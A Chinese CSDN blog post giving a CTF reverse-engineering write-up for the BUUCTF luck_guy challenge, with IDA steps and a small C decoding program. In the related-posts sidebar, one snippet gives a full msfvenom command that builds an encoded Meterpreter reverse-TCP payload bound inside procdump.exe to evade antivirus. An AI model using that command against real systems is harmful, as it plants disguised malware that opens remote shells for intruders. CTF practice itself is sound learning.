BUUCTF-Reverse-[GXYCTF2019]luck_guy 题解

于 2024-10-04 16:54:48 发布
阅读量159 收藏 2
点赞数 3
分类专栏: BUUCTF Reverse 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33348179/article/details/142704170
版权

过程

1.下载 得到一个无后缀文件、

2.拖入exeInfo 是64位

3.打开IDA64 SHIFT+F12 查看字符串

看到有和flag相关的字眼 点进去看

4.F5查看伪代码

观察 发现f1 f2两个被连接到了s上并打印出来 这可能就是最终的flag

查看f1字符串 为:"GXY{do_not_" 

分析switch的代码 发现似乎是case4和case5比较关键

将31行代码转换为字符串并变为小端序 为icug`ofF\x7 33行又将f2与s连接 所以f2为 "icug`of\x7F"

分析case5 是对f2的操作 上代码:

#include <stdio.h>

int main(void)
{
    char f2[] = "icug`of\x7F";
    for (int j = 0; j <= 8; ++j)
    {
        if (j % 2 == 1)
        {
            f2[j] -= 2;
        }
        else
        {
            --f2[j];
        }
        
    }
    printf("%s", f2);
    return 0;
}

运行得出结果:

将f1大括号后和f2大括号前连接 得到flag:        flag{do_not_hate_me}

结束。

艾莉莉阿文
关注
专栏目录
BUUCTF reverse:[GXYCTF2019]luck_guy,findit,简单注册器题解
weixin_50549897的博客
02-01 889
[GXYCTF2019]luck_guy题解 由于作者水平有限,有不当之处或有更好方法请在评论区指出 题目地址https://buuoj.cn/challenges 拖进IDA,查看main函数 找到patch_me(0),里面可以看到,如果输入的是偶数就进入get_flag()函数。本题关键应该就在里面。打开后 unsigned __int64 get_flag() { unsigned int v0; // eax int i; // [rsp+4h] [rbp-3Ch] int j; //
BUUCTF reverse题解汇总
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-31 7993
BUUCTF平台刷题过程中做的一些逆向题解的总结归类
BUUCTF题目Reverse & Pwn部分wp(持续更新)
苦行僧的妖孽日常
09-18 1746
BUUCTF题目Rverse & Pwn部分的writeup(持续更新)
BUUCTF Reverse 逆向方向 9-16题 详解wp
qq_62564422的博客
01-30 2022
本文是对BUUCTF平台中Reverse方向题目的第9至16题的详细解析。这些题目要求参与者运用逆向工程的技术和工具,深入分析给定的程序或系统,以发现隐藏的信息或漏洞。我们将详细介绍每道题目的解题过程,包括静态分析和动态分析,以及如何使用常见的逆向工程工具如IDA Pro、OllyDbg和Ghidra等。通过阅读解析,参与者不仅能够了解这些题目的解决方案,还能够学习到逆向工程实践中的技巧和策略。无论您是CTF新手还是有经验的CTFer,这些解析都能为您提供有价值的指导和启示。
BUUCTF-逆向
weixin_52125240的博客
04-11 5972
BUUCTF-ReBUUCTF-逆向1.easyre2.reverse13.reverse2 BUUCTF-逆向 1.easyre 先用虚拟机看看是多少位的文件; 拖进IDA看看,一下子就出来了; 2.reverse1 先用虚拟机看看是多少位的文件; 打开IDA,查找字符串; 点击View->Open subviews->Strings 然后观察伪代码 所有的 ’ o ’全都变成 ’ 0 ‘ ; flag{hell0_w0rld} 3.reverse2 一样的看看文件是多少位的;
BUUCTF 逆向1-48
zwb2603096342的博客
07-06 768
BUUCTF逆向速刷
题解
qq330079598的博客
03-03 263
文章目录@[toc]1062 Text Reverse2104 Hide Handkerchief(质数)2734 Quicksum1170 Balloon Comes! 1062 Text Reverse Problem Description Ignatius likes to write words in reverse way. Given a single line of text...
周报2.0
meccke的博客
04-26 978
在研究unity虚幻引擎怎么搞游戏,刷点buu吧1.内涵的软件64位拖进去就有flag,嗯......xor输入b,进行异或后和字符串比较,点进global逐次点进,提取数据,main函数中的异或是i和i-1,我认为等效于i和i+1异或,但是不包括第一位元素,写脚本。
Buu学习之Reverse
qq_73302475的博客
07-23 787
R:将数据转为字符(连续的字符串不建议使用,因为不同程序里,大小端存储会影响字符的排列)A:将数据转为字符(不建议使用,因为不同程序里,大小端存储会影响字符的排列)X:查看交叉引用G:跳转到目的地址N:重命名变量名/函数名H:使数据在十进制和十六进制中转换Y:改变变量类型/数组大小D:更改数据的存储类型(32位最大为dd(四字节))(64位最大为dq(八字节))/ 或者;:在光标所在行上写注释(;是汇编代码中使用的注释)U:取消函数、代码、数据的定义P:重新编译函数。
[BUUCTF]REVERSE解题记录 [GXYCTF2019]luck_guy
weixin_44192213的博客
02-27 254
1.拖入ida中 直接找到最关键的getflag() __int64 get_flag() { unsigned int v0; // eax@1 signed int i; // [sp+4h] [bp-3Ch]@1 signed int j; // [sp+8h] [bp-38h]@7 __int64 s; // [sp+10h] [bp-30h]@3 char v5; // [sp+18h] [bp-28h]@6 __int64 v6; // [sp+38h] [bp-8h
buuctf-[GXYCTF2019]禁止套娃
qq_42728977的博客
12-24 3719
[GXYCTF2019]禁止套娃考点复现法一:单纯构造GET参数法二:构造session组合拳参考 考点 正则表达、无参数rce、git泄露 复现 法一:单纯构造GET参数 打开就一句 然后查看源码,空空如也。想到扫描后台文件,使用御剑很慢,使用dirsearch,一直429,查找资料,加了-s参数,也就是扫描不能太快。 python3 .\dirsearch.py -u http://5c0edec0-316a-4de9-999a-669f813c771b.node4.buuoj.cn:81/ -e
[0xFA-2021][Buuctf]Reverse_1
weixin_50962947的博客
09-13 1045
[0xFA-2021][Buuctf]Reverse_1 你应该知道的: 使用IDA打开一个文件 学会使用IDA的字符串窗口 学会IDA基本的操作 对引用有初步认识 用IDA打开一个文件: 我们可以直接打开IDA,然后: 可以点击New来打开一个新文件,或者点击Go把可执行文件拖入IDA,这二者都是可以的。要注意的是因为32位和64位的应用程序是不一样的所以我们要用对应的IDA版本来打开文件。如果一开始并不知道文件是几位的可以直接拖进其一,如果版本错误则会提示: 或者在反编译出现错误提示,因为程序
BUUCTF-MISC-[GWCTF2019]math
zippo1234的博客
10-30 1136
BUUCTF-MISC-[GWCTF2019]math[GWCTF2019]math题目分析开始1.题目2.源程序分析(1)查壳(2)IDA分析3.pwntools4.脚本5.get flag结语 每天一题,只能多不能少 [GWCTF2019]math 题目分析 pwntools交互 recvuntil方法 开始 1.题目 给出一个环境。 环境连接后提示: 给出一个算式,要成功计算150次,每次几秒内没给出结果就退出。 和这个环境的源程序。gwctf_2019_math 2.源程序分析 (1)查壳
BUUCTF-reverse-五道较简单题
feng_2016的博客
05-14 1986
[GWCTF 2019]xxor 比较简单,就是Tea加密变种 Tea加密可以到ctfwiki学习,解密原理是逆向求解 解密最好用c语言写,python写有点麻烦 [GUET-CTF2019]re 逻辑很简单,就是比对 注意v[16]和v[17]位置调换了 少个v[6]爆破即可 [V&N2020 公开赛]strangeCpp 关注不合理的夹杂数据 通过welcome字符串中不合理的夹杂数据定位到关键函数 __int64 sub_140013580() { __int64 *v0; // rdi
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8485
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全】Cookie与ID未强绑定导致账户接管
最新发布
等风来
10-02 141
DigiLocker 是一项在线服务,旨在为公民提供一个安全的数字平台,用于存储和访问重要的文档,如 Aadhaar 卡、PAN 卡和成绩单等。DigiLocker 通过多因素身份验证(MFA)来保护用户账户安全,通常包括 6 位数的安全 PIN 和一次性密码(OTP)验证。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-27 766
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
信息技术网络安全政策制定
网络研究观
09-27 1038
网络安全政策的真正必要性很简单:网络安全并不像锁门或不偷公司笔那么简单。在许多情况下,网络安全问题并非来自恶意,而是来自无知。
在kali Linux中进行msf免杀实验时,使用测试编码并绑定微软官方工具procdump,使用官方procdump做实验 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168. 134.134 LPORT=8888 -e x86/shikata_ga_nai -x procdump.exe -i 20 -f exe -o flash3.exe应该怎么改
05-05
如果你想进行msf免杀实验,并使用procdump.exe作为载体来绑定恶意代码,可以使用以下命令: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.134.134 LPORT=8888 -x procdump.exe -k -e x86/shikata_ga_nai -i 20 -f exe -o flash3.exe ``` 其中,`-k`参数用于保持进程执行,直到meterpreter session被开启。这个参数在绑定时非常重要,因为它确保了procdump.exe进程继续执行,而不会在绑定后立即停止。这样可以确保你的payload成功植入目标机器并得到执行。 你还可以尝试其他的msfvenom参数,以便更好地适应你的实验环境和目标机器。例如,你可以使用msfvenom的`-b`参数来指定bad characters,也可以使用`-a`参数来指定目标机器的架构。请根据需要进行更改。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值